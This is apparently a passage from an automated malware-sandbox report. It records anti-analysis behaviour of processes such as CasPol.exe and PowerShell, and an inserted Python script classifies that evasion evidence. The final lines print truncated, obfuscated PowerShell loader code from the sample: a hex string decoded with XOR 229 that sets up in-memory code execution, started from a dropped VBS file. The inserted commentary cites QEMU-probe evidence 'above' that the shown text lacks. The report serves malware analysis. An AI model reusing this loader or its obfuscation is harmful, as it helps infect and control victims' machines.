            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9341
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8733
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9929
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07526980 GetSystemInfo,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 30000
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | System information queried: ModuleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00B7E0F8 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: page read and write | page guard
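The evasion evidence above (opens of the QEMU guest-agent binaries, Win32_NetworkAdapterConfiguration / Win32_BaseBoard / Win32_Processor WMI queries, sleeps beyond the 30000 threshold the sandbox prints, DebugPort queries) is what an analyst has to turn into a triage verdict. The Python below is an added example, not part of the report or of the sample: it parses a handful of these evidence lines, copied from this section with the source path and action label fused exactly as the raw text export renders them, and summarises per source process which evasion techniques were observed. The action vocabulary, the class list and the verdict names are this example's own choices (only labels and classes seen on this page are listed), and sleep magnitudes are taken as the report prints them.

```python
import re

# Constructed sample: evidence lines copied from the report section above. The raw
# export fuses the source path and the action label ("...exeFile opened:"), so the
# parser splits on a vocabulary of action labels (assumption: only the labels seen
# on this page are listed) and also tolerates a " | " separator between the two.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768Thread sleep time: -39000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204Thread sleep time: -2767011611056431s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: page read and write | page guard",
]

ACTIONS = ("File opened", "WMI Queries", "Thread sleep count", "Thread sleep time",
           "Thread delayed", "Window / User API", "Window found", "Process created",
           "Process queried", "Process token adjusted", "Process information queried",
           "System information queried", "Queries volume information", "Code function",
           "Memory allocated", "Last function")
EVIDENCE_RE = re.compile(
    r"^Source: (?P<src>.+?)(?: TID: (?P<tid>\d+))?(?:\s*\|\s*)?(?P<action>"
    + "|".join(re.escape(a) for a in ACTIONS) + r"): ?(?P<detail>.*)$")

VM_GUEST_AGENTS = ("qemu-ga", "qga")           # QEMU guest-agent binaries probed above
HARDWARE_CLASSES = {"Win32_BaseBoard", "Win32_Processor",
                    "Win32_NetworkAdapterConfiguration"}  # classes queried in this report
SANDBOX_SLEEP_LIMIT = 30000                    # the threshold printed as "... >= -30000s"


def parse_line(line):
    """Split one evidence line into source path, process, thread id, action and detail."""
    m = EVIDENCE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["proc"] = rec["src"].rsplit("\\", 1)[-1]
    return rec


def _new_entry():
    return {"vm_probe_files": [], "wmi_classes": set(), "max_sleep": 0,
            "debugger_checks": 0, "other": []}


def summarize(lines):
    """Aggregate evasion-related evidence per source process."""
    summary = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = summary.setdefault(rec["proc"], _new_entry())
        action, detail = rec["action"], rec["detail"]
        if action == "File opened" and any(a in detail.lower() for a in VM_GUEST_AGENTS):
            entry["vm_probe_files"].append(detail)
        elif action == "WMI Queries":
            entry["wmi_classes"].update(re.findall(r"Win32_\w+", detail))
        elif action in ("Thread sleep time", "Thread delayed"):
            # The report prints delay intervals as negative (relative) values; only
            # the magnitude matters here and the unit is taken as reported.
            num = re.search(r"-?\d+", detail)
            if num:
                entry["max_sleep"] = max(entry["max_sleep"], abs(int(num.group())))
        elif action == "Process queried" and "DebugPort" in detail:
            entry["debugger_checks"] += 1
        else:
            entry["other"].append(action)
    return summary


def verdicts(entry):
    """Map one process's summary to the evasion techniques it evidences."""
    out = []
    if entry["vm_probe_files"]:
        out.append("vm-guest-agent-probe")
    if entry["wmi_classes"] & HARDWARE_CLASSES:
        out.append("hardware-fingerprint-via-wmi")
    if entry["max_sleep"] >= SANDBOX_SLEEP_LIMIT:
        out.append("sleep-past-sandbox-limit")
    if entry["debugger_checks"]:
        out.append("debugger-check")
    return out


if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE_LINES).items():
        print(proc, verdicts(entry), sorted(entry["wmi_classes"]), entry["max_sleep"])
```

Run as a script it attributes all four techniques to CasPol.exe (the injected host), only the long sleep to ieinstal.exe, and only the qga.exe probe to the SysWOW64 powershell.exe, which is the split an analyst wants when deciding which process image to pull memory from.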
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun 
ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 
'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$damspils = """refgrukonnacsktdoikloutnhe grhshtpubmi mi{g ud ho pr hvpflarurnoavamso(st[desbotorrmoiannbogph]di`$hihstsbl)ro;pa ni vn ra sa`$inbvoyuntalesisbe sp=af unnbregrwkr-byocabomjcyeuncbytor prbglyfotprest[be]av fa(fo`$alhdesst.milquerinpegbathahge te/un ev2me)ta;sm op fo st chfmookurun(sc`$haidr=di0pr;is ly`$haipo sn-ovlkitco dy`$flhspspe.gylskeoknbrgcatsahal;ko sp`$deitr+da=sk2ak)la{ma sp wh ko gu va st ba pt`$prbudysttauebesur[hy`$odist/kf2ar]re ka=de ku[abcfootonpavtoeudrcotfu]je:bo:sptstoskbglygrtpreur(su`$uihdesno.casprucobovspotwerhyilintrgcu(st`$maima,le di2my)in,pa pa1az6no)ju;co ba rn`$gabopytitstebosdi[au`$eliad/as2ma]pa ve=tr sh(ci`$spbaaytetoxebosin[ra`$maiom/ba2am]bo do-tibdixglomorpa en2fr0ba1om)he;au vg re mr as}mi mi[suskktturspifanmagov]en[grsinyhyscltcaestmin.sttpoeudxuntko.reeafnthcunotrdariunnregta]be:ka:ovaslstrcpaiexibr.digsaehatmisoutalrspitansugbi(me`$elbinyettinemassu)ci;by}mi`$inrhaegrcovagilsycteioptrhrriahitdieme0pi=lihomtexbov sn'ho9thasnbvi0vabaaarabcidplacocgyavo4opein7weakodpeaex5opafr5cu'bi;ge`$emrafebycdiaemluncheiaptrirexahetstebe1lb=guhdatgebsk le'di8rg4lyapr0inaviaspbrebboaco6sibslakoafi6scabrfmiblidsiemo7be9laeunast0biako7wrfcaaunfstbhoech7ra9chcpaabe7skbadapaatr8huakefskadockn8sk7maapr8robcrdfoape0meblafscajucno8te4boarecspbdiddeaun1biati6tuawedhebilari'im;ga`$horisemiccaachlpocfoitrtberdeafltfoexx2ma=ruhmetovbno pi'ru8lyeraaobcmybandun9in9anbidbbaahy6wiaspaun8pa8joabidflasvdfabdabciabichabjaaprbanafo'ju;sa`$mtrthehichyaunlcycseidetnorsnaebtteedy3ge=urhmatphbbu 
ex'si9adabebna0olbmiaskbbodbramucunaru4hoech7be9sybfobuscopaun7fabundspaop0haaan4kiarecsresm7ga8ro0doagl7tibfodglasicyobsubdeajo6flbai9af9maakiaspcsabfjbgabfrfbnasw0ovaweacuatectoblaaouefo7sa8se1inati8spaec7deafodsaaop5foaalcgi9cybfiareckladrffe'ko;be`$tormaeprcnoainlrecetimatinrwiakotaleex4ga=fohtitbabwe un'ovbtrahebindilbpybfaaev0koabe7amasteun'fo;co`$skrseevacobabrlincryidetgrrwhachtfoera5ba=cchsptanbpr au'in8vgefnapacypbmodom8kl4raamu6deacodhubhicsnahy5loagecud8th1trafl8inaen7taaundbuael5afakacre'un;af`$gardeebocmyamelmackvioptmirheatrtpaesa6pl=hehomtkibul ea'ku9svbub9lidge9neasubfe9foanaclaainaheafy0foakh8caatr5un8to7flaen8koahe4doabicdiebl5hieoi9ha8po1maafl0alataddiacicaf8gibspbca0ra9buaduaae0udacaesjetr5goeha9op9ma9stbexcwoastbkrarn5beafl0amaaraaf'uk;jo`$terbaerecnaaholdrcjeiomtimrouanotsoeko7re=suhxytrubta tr'na9libfobscchuade7aabgrdjuaca0foagi4anarecgleyo5maeka9or8mi4deain8moasj7euath8fuafoeimamecunabedgi'ty;do`$terflevacinameluocpuiovtwirleakntmnean8st=tihpatpabst st'tn9libchanoclyajoflyaas5diafacviadmabobcadopalvcgaahidpr8hadvaapocovapo5taanoccraprescaci8mebapdnoakacly'st;un`$smrfiesicseaseldicpaivatrarteapotreedr9ov=mehdotsibst ca'ta8os0glano7ro8ch4peatrcreaop4beast6aabaabilbal0en8st4hoafe6yearadlsbexcunaun5prapocde'fo;ro`$stdnoegomfgasugcynkiereteviamzpaalmbblludepl0co=pahaltagbki ma'ba8dr4nobsy0sa8todhuafrcteat
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn 
Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 
'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
